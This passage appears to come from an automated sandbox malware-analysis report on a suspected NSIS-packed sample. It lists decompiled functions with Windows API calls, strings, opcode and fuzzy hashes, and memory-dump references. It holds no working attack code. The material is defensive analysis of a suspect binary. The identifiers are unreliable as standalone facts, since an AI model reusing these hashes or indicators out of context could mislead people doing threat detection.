                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            Function 0040667C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":
                                                                                                            • API String ID: 589700163-165019052
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1941528284-0
                                                                                                            • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                            Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                            Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                            Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            Function 00405F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,76F93420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: nsa
                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                            Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
